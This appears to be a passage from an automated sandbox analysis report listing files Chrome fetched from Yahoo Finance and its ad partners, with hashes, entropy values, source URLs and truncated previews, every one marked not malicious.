                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2E1F893D4F7033B24FDD21B149EDB5BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5BC96655CD5FC72FC0748BC4644E8C3A5DE6A632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7D15DDFC2FD91F4AADE91775433DC2A7F72E7F239103F5B725EDF575CB8E1B5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D44D73780A3485B11E00CE1A1888CD3A56763F97F60F1AEB8A1A23177F6BF6522C13FAF2F0E89925E0CE77E20A5809949F3A738E6E80AC9F6DB24879EB35108A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M11 15h2v2h-2zm0-8h2v6h-2zm.99-5C6.47 2 2 6.48 2 12s4.47 10 9.99 10C17.52 22 22 17.52 22 12S17.52 2 11.99 2M12 20c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8"/></svg>';export{s as E};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2482
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618253337400248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:TXT4eQ7M0Vk677M0Kk6+7r10Sk6H72X10ak/7e0kk27H0vu7H0v4Z:DTNQ7nVb7nKe7rKSn72KaC75kR7Uvu73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:67CD86F2B85134ECD4204CEE00DFFAF9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:07B0B211F8D722775647CA82DE48685381A9A7E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D15E6D93C15C580E902CE7F034E60E8E9036848441137C7F336A0436BCA61D39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:917B99E9177034AAF095BC5E1011ABC48EC07DB331B87D8FAFB0DE6DD4F7991A0CD17E3E9DC99CE5D10F2F49AD19E87C7800537D95B8BAA46AD3B54D8490DE44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://edge-mcdn.secure.yahoo.com/ybar/exp.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "expCount":7,. "selection":"individual",. "uploadType":"group",. "runProb":10,. "expList":[. {. "name":"vpixiea",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-a<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"], . "timeout":5000. },. {. "name":"vpixieb",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-b<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"],. "timeout":5000. },. {. "name":"vpixiec",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/pixel.gif",. "target":"https://v-c<RAND>.wc.yahoodns.net/pixel.gif",. "trials":1,. "uploadEndpoints":["http
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.176789192964165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUVAae/XExlHrfx/n:8aOUJ/n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:56398E76BE6355AD5999B262208A17C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A1FDEE122B95748D81CEE426D717C05B5174FE96
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2F561B02A49376E3679ACD5975E3790ABDFF09ECBADFA1E1858C7BA26E3FFCEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FD8B021F0236E487BFEE13BF8F0AE98760ABC492F7CA3023E292631979E135CB4CCB0C89B6234971B060AD72C0CA4474CBB5092C6C7A3255D81A54A36277B486
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a...................!.......,...........T..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.689035797843321
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YMsw/ncMHJAuwxk8HHiJsMMg/eUtfYtlm2spn/Fx2VHfCkpHC+MZt:YMsw/ntHJqPMMg/ptQoXn/Fx2t6mHqt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D46B10303ECFF8C2CCE98EC431086E2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C7A24E3C5B292CBB844CB5D43FC4B2E1FAA18294
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9B6F3685E1D9549028157658D696862CF744696EC519852D5BD4207F03E440DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:435F568252DCAEBB0609B7B0C26DD23B563BE69F97352F7F8876DF961CECEED4F8B3C3FFA94093873D830A3D3D8E89AE41048087444C3170208268E133073655
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"identifier":"b4p940tjflnfm","identifierType":"bid","tosRecords":{"nonEu":{"consentEvents":{"iabCCPA":"1YNN","gpp":"DBAA","gppSid":"-1"}}}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4428)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4429
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.379740973025736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:Pl4WQnFJsVxHP5z+fxPJNMS8Qo1C9dDO6RoroQyBtR2QhBFxbKOS6YxoTWU:PxgCrPJql8QoM7DOqorny55hzl1S6Y+R
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:31211358429BC86F0FE2EF8BF232E71C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:90F2C0C6EB04C2470C2AFE5D6425A0BD2EC06278
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF9AC4A3BE628402019BE2F26904CC44B6F60EA80026E723E7C9538C15218F69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:78039E40FB6CA09EE03B116D3752FF8D9A5FE0B27D0447366B66BD4E8DEA4FCDE6CB95E062519EAC45E0AB0719F800319A2C68F935E6566F44ED2DE532232AB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as O,h as k,c as D,L as v,t as U,O as j}from"./commonUtil.BWwawKjd.js";import{f as G,l as F}from"./logUtil.CCV3qKPL.js";import{g as _}from"./loadSparkline.C8zWaz2x.js";import{n as Q}from"./server.CGBHKPKz.js";async function x(t,e){var i;const r=await O(t);if(!k(r)||!((i=r.user)!=null&&i.guid))return null;const{symbol:o,silent:s=!1,setLoading:n=!0,reuseData:l=!1}=e,[a]=await D(["portfolio"],t);if(l){const f=a.getHoldings();if(o&&f[o])return f[o];if(!o&&Object.keys(f).length>0)return f}n&&!s&&a.setLoading(!0);const c={};o&&(c.symbol=o);try{const f=await G(t,{crumb:!0,pathname:"/v1/finance/portfolio/holdings",perfLabel:"loadHoldings",query:c}),{result:d}=f.finance,p={};return d.forEach(m=>{p[m.symbol]={...m.holdings,longName:m.tickerLongName,portfolioHoldings:m.portfolioHoldings,symbol:m.symbol,tickerType:m.tickerType}}),s||a.updateHoldings(p,o,n),p}catch(f){return F(t,e,{data:f,perfLabel:"loadHoldings"}),s||a.setError(v,n),null}}const V={"1mo":"1m","6mo":"6m",ytd:"YTD",max:"Max"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x156, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.984411789000101
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:NGTcvKYVs11K6u1PzUZ2zvlXPOpoxEY2kywb8hmlfwoy0sHbVUVIZN099PH4tl12:NJvKes11KRPYZMefzkF8hWCbVUVIZNIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EF40051E72F365A4D4B8D99B5194480E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6FEB9FC232F5DBB44168FD48A8ECC2CE7F4D24A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F4DBC7792E457923DEB39A711BF4C1153B7BAE88CCCA5176CB40C52771C3C929
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CD2FFDAFB453B64D6048A580F9991FC78446BCE80DBD0B1802D281D83713EAE31B27F361B2C4359055048BB6E9F4D713D7BFD33F2E10FD9D7F2D0486F1A1B845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/1exjVpdKZ.RKQhQMvgY39Q--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2023-09/e0cf9c30-5ee8-11ee-af7e-5e30c1880d05.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF.-..WEBPVP8 .-..P....*,...>y2.G$..!-.....@.(..h......_._3.{.s....^...|..3.y.c..3....W.g..S..._.V....o.~t>...?.B.....m...B=.. .MA.....>y.{..........................Q~...~...1z.E5Ki..~.8z.).\.3..G.5nk,..+......X..._..d].....^.^....?n{.....D.:=u.3..K.../m.8..q.-.d.5..&.g.m_.....Z....!.=..>. .......e....I.....&....E^8Q.u'..X/.-...@1..t156....L.:kmX..._E...'pP/...uj^$jpU4.n....X.F.......mQ.h...x~.....T.{.yF.|.M..)...............WCy.1..ex.....;,* p#W.9Y`.t...$..Re.C.V..4.#F./.!&B..f...!..3@....u..!..Y.R.y.e....8...D.f.].....5.uv.yT.....(I...q.+:0....}.u...3....4......i.`..[J..*..]..'.D.zw.2.f...u$..p.i>M.KtQ. .Q.1.3....eQw...b!6..f..|.M.D;.>Y....ai........j..Tj....mEWM......A..E.........3.;......q$9_<K.0."..X..G}u...D./Q1.Z..fW.E:...q...A....QA...O.M.z"...4K&....mN.Y..I.}..k......;..j~Z.OR........y E.w.`r...........A.?sH....Vm.....u._...N....u.zn...!...#..M.R..UcxD....=...j..........!........2".B8h..R._..|..@..;.0.S....1p0.-.... .
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2585
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.001752684892279
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:wYtCUrdT69ptAa7dgMYD3CijeaukmlLXNL:wa/T6bDpgVD3Cm5iLdL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5B65F13DE57D9234113B2BD27E125781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:93B6D5CC546DB57531741694374958FE1B53F935
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2D4027FA94C7F761405FDF4C959FD8B182DF8AC4FCAA20E6D5466259E3B74450
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A985B84895927ADAC952A61B9AFDC21F88D1155DE5C16CC911389F8635F4DF26CC592090C7D8C9EF69DFFBCD080C12717F0708BC4A00152FC9888D656826CBCD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/static/22/228515c2-9c18-491a-a142-95df43dd9630.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans Black'), local('YahooSans-Black'),. url('//cdn.taboola.com/static/96/96222d7a-b7a8-4ca5-bfe7-008ade6e5ae3.ttf') format('truetype');. font-weight: 900;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans ExtraBold'), local('YahooSans-ExtraBold'),. url('//cdn.taboola.com/static/4d/4d1a609b-f3ba-4e89-a524-446fccbad58f.ttf') format('truetype');. font-weight: bold;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans Medium'), local('YahooSans-Medium'),. url('//cdn.taboola.com/static/d5/d583f597-33a2-439d-b6e0-84e966517fa4.ttf') format('truetype');. font-weight: 500;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Yahoo Sans';. src: local('Yahoo Sans ExtraLight'), local('YahooSans-ExtraLight'),. url('//cdn.taboo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 24 x 24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.312089486802539
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Hy2JSJMlCPAI9eI7N7miqiZov00hnp07om47jSW3lAm0loMX7nR1wKp:Hy2JSqCDsIbTov00hnp07om47jlHevnR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:953C1AC7E3B4E3D58367E20B064034BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FE8BE09EEE45EBF11C4C46918879725C85FE41E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:123988D9B5968899975FF52A55B198E7209D4EC023F3A7462FDA68B52AC2B463
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:70CFDA1C11AC079F51B971C9DD0426895990E350C041DDA60E13D86D38B0D043B5D647F750B7F479270BBA439A7375775BFCEAD62BA210F1E0F8FFE52791B420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/ok/u/assets/img/spinner-24x24-anim.gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.................................................................................................!..NETSCAPE2.0.....!.......,............%...%eZ..4Z............<.a ..&...x..w..........8qT&...aH0D...P\.....1....~.J*...`#..B.5....5..|%..V@.@....Z@....'....5........)..q)...)....n*.....#....n....D...|......g.?..?.......Z.9......$.."..".......q..0 .,E........@..T.)....:L!..!.......,............%..3.".(s...P<>...Rb.........U9...AL..,/......*@.........Vp.O.DB.t.&..A.........M}........u......'tA.....i6..g,...i.~';2..|h.W......|.../'..g....W".'zW.....1....#.6....."J.6J'."...0A!.!.......,............%..E.(:........V2.7*....A.$..^I.q.....RH.....`...........nDR"@ ...k1..0.E!.....H7......../....q~~...0.l/....KXc%...M".)......S..D......"......c.4.|#..$.."."..0..#../..Y.4O.=.....B.0!.!.......,............%..u@e."$..B......\.<.(.....|..A(b.f....{...kJ..D/.H..p\.N(eq0...ds......^..S}.........P...Czy.f.$.......%......).....Z......p;.....e$7"...dQ....3.._.7..r|..#..E>.1....*.$.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (27263)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):29179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3072178380094845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:0Hcmkx25/P3kPuUI3o5XJiaTCCsSoR8B7n9412k4mQIiNlHgyLtvUfHSl7Ht99N0:M7wJiigAt8MVULz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B18AF08EF91B3180EF1FB4F31013345E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D457EB66449233FF7738D8264AA5AC70BA28E620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2AC9661596844AB9D4309958B3FB4014D78DC898BCC11691C5BEF9F66AA441CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B984EE8667A18DB0B4CAAEA3673B31E3C4FA463B9CECAE736479AB1BCB342CC03CD4EA7755013337356A503505521020CA8006E3192BF3029F4C738E79DBB286
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/43.BgWy8GOF.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{n as M,a8 as ht,v as pt,s as gt,a1 as mt,a7 as yt,I as _t}from"./scheduler.Dsuh-FKt.js";import{H as oe,S as ve,R as He}from"./control.CYgJF_JY.js";new URL("sveltekit-internal://");function wt(e,n){return e==="/"||n==="ignore"?e:n==="never"?e.endsWith("/")?e.slice(0,-1):e:n==="always"&&!e.endsWith("/")?e+"/":e}function bt(e){return e.split("%25").map(decodeURI).join("%25")}function vt(e){for(const n in e)e[n]=decodeURIComponent(e[n]);return e}function ge({href:e}){return e.split("#")[0]}const At=["href","pathname","search","toString","toJSON"];function St(e,n,t){const r=new URL(e);Object.defineProperty(r,"searchParams",{value:new Proxy(r.searchParams,{get(a,o){if(o==="get"||o==="getAll"||o==="has")return s=>(t(s),a[o](s));n();const i=Reflect.get(a,o);return typeof i=="function"?i.bind(a):i}}),enumerable:!0,configurable:!0});for(const a of At)Object.defineProperty(r,a,{get(){return n(),e[a]},enumerable:!0,configurable:!0});return r}const Et="/__data.json",kt=".html__data.json";fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65504), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):73447
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.315425597976914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:NNDF5DvyAoNTQaRX7tbMNC1fNZz4zKTGkvOsZ0CJ/h:Nn5D0kgxD/h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:841DABCE0B477A93D9CF7379B9EB1368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F1AFDA122D766036A7C3418D785C17168106A391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1616C8CD083E6B17F6A75AB0695BD4A4573B31AE8398FFB43758288028F6A773
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F8B298EFFAB6828E6386061FBC87CF6924EB9DBCAF82C559F76F6A8D924A752D97B6FD750BEB90CAC7D32B995903A7A075A17D18060B632DA416444B81943406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e,t,n){return e(n={path:t,exports:{},require:function(e,t){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}(null==t&&n.path)}},n.exports),n.exports}var n,r,i=function(e){return e&&e.Math===Math&&e},o=i("object"==typeof globalThis&&globalThis)||i("object"==typeof window&&window)||i("object"==typeof self&&self)||i("object"==typeof e&&e)||i("object"==typeof e&&e)||function(){return this}()||Function("return this")(),a=Object.defineProperty,u=function(e,t){try{a(o,e,{value:t,configurable:!0,writable:!0})}catch(n){o[e]=t}return t},c=o["__core-js_shared__"]||u("__core-js_shared__",{}),s=t((function(e){(e.exports=function(e,t){return c[e]||(c[e]=void 0!==t?t:{})})("versions",[]).push({version:"3.33.3",mode:"global",copyright:". 2014-2023 Denis Pushka
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15264)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.53729719471769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:uQTCfjv99mW+911+Fl0YD0Dew/X2q5ulRIUeT:uQTCfGZ1+Fj9w/XuuT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E2202E6ED6EF52CEC2C4A875C99225BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FD48D3157CFA6B6E6FEC3E50787E357AA3288C88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F2CFBD195DFF011843F93E2D32979F6F07926211CBF3EDDDC3B708B0BB04C8A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4E2AEFD87D89F4D5C00CFCAC8EE2D7748F84979BE9E66272475A621A19BA8FC884737DF604B3B7344FE4EB0C1154819880BC3769E25798BB4ABDDEF76EDC9B4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* @preserve. * $Id: rawdeflate.js,v 0.3 2009/03/01 19:05:05 dankogai Exp dankogai $. *. * Original:. * http://www.onicos.com/staff/iz/amuse/javascript/expert/deflate.txt. */./* @preserve. * Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp>. * Version: 1.0.1. * LastModified: Dec 25 1999. */./**. * @preserve This code contains an altered version of the original source and is not meant to misrepresent the original software.. */.function base64(r){if("undefined"!=typeof btoa)return btoa(r);for(var t,e,n,f,o,i,a,l="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",u=[],s=0;r.length>s;)t=r.charCodeAt(s++),e=r.charCodeAt(s++),n=r.charCodeAt(s++),f=t>>2,o=(3&t)<<4|e>>4,i=(15&e)<<2|n>>6,a=63&n,isNaN(e)?i=a=64:isNaN(n)&&(a=64),u.push(l.charAt(f)+l.charAt(o)+l.charAt(i)+l.charAt(a));return u.join("")}function lzw_encode(r){for(var t,e={},n=(r+"").split(""),f=[],o=n[0],i=256,a=n.length,l=1;a>l;l++)t=n[l],null!=e[o+t]?o+=t:(f.push(o.length>1?e[o]:o.charCodeAt(0)),e[o+t]=i,i++,o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5574)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5575
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.475336053396335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:8K6OPszF1mX1gSJAWhZNNOt/BemAgKtfO1FPkbudTJNOt/BcemO5KUtfRRbQFZGt:T6O0z7mXuSJAWhZNNORBemAgK62SdTJI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0AF292614E8A65A8DB62F5695415C156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F18A8C56757A8D8736FD5A2AFFF702E07D53320A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E976F9E717E535E3C17492A067E30413948A95B133729C801D0CD1BC27558F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C6FFB256C4879A35D65E8333077938DEC25E9957E5F4DDE9DE665BC40A5A40B9882C73820AACD2901DF90E9880976753577CB850AA70942A364DD109D560B34D
